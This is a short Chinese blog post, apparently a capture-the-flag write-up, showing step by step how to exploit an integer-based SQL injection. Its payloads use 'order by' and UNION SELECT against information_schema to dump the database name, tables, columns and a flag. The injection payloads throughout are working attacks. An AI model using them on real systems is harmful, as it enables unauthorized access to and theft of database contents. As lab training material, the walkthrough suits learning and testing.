标签：存在   bsp   字段名   lda   注入   表名   字段   data   database   

1.检查是否存在注入

and 1=1 返回正确
and 1=2 返回错误

2.猜出字段数

order by x（数字）
得出字段数

3.然后就是爆数据库名，information_schema三步

?id=1 and 1=2 union select 1,database()

得到数据库名称sqli

4.爆表名

?id=1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema=‘sqli‘

得到表名 news,flag

5.爆字段名

?id=1 and 1=2 union select 1,group_concat(column_name) frominformation_schema.columns where table_name=‘flag‘

得到字段名flag

6.爆flag

                                                                        字段名          数据库.表名
?id=1 and 1=2 union select 1,group_concat(flag) from sqli.flag

得到flag{hdjaldanklfk2r3rb23ry34gf82huh2u9f}

sql整数型注入

标签：存在   bsp   字段名   lda   注入   表名   字段   data   database   

原文地址：https://www.cnblogs.com/threesoil/p/12431496.html